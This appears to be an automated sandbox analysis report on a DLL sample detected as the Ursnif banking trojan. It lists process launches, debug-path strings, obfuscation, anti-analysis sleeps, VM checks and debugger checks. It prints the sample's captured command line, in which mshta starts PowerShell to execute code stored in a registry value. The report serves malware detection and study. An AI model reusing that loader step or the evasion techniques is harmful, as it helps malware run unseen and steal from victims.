Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: lj3H69Z3Io.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: lj3H69Z3Io.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000002.00000002.444299096.000000006E191000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.616072901.000000006E191000.00000002.00020000.sdmp, WerFault.exe, 00000014.00000003.411602089.0000000004DE1000.00000004.00000001.sdmp, lj3H69Z3Io.dll
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbD source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141F7C LoadLibraryA,GetProcAddress, 3_2_6E141F7C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17446D push ecx; ret 2_2_6E174480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E142D07 push ebp; ret 2_2_6E142D17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E174AC6 push ecx; ret 2_2_6E174AD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142200 push ecx; ret 3_2_6E142209
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E142253 push ecx; ret 3_2_6E142263
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17446D push ecx; ret 3_2_6E174480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E174AC6 push ecx; ret 3_2_6E174AD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BF506 push ds; ret 3_2_6E1BF508

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3118
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1592
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E188626 FindFirstFileExA, 2_2_6E188626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mshta.exe, 00000029.00000002.587051419.0000023411E24000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}>'>B
Source: WerFault.exe, 00000014.00000002.438909171.0000000005107000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000014.00000002.439272427.0000000005490000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E141EB0 LdrInitializeThunk,LdrInitializeThunk,VirtualProtect,GetWindowsDirectoryA, 2_2_6E141EB0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E17875F
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E141F7C LoadLibraryA,GetProcAddress, 3_2_6E141F7C
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_6E17DF99 mov eax, dword ptr fs:[00000030h] 2_2_6E17DF99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E17DF99 mov eax, dword ptr fs:[00000030h] 3_2_6E17DF99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E1BD8B6 mov eax, dword ptr fs:[00000030h] 3_2_6E1BD8B6
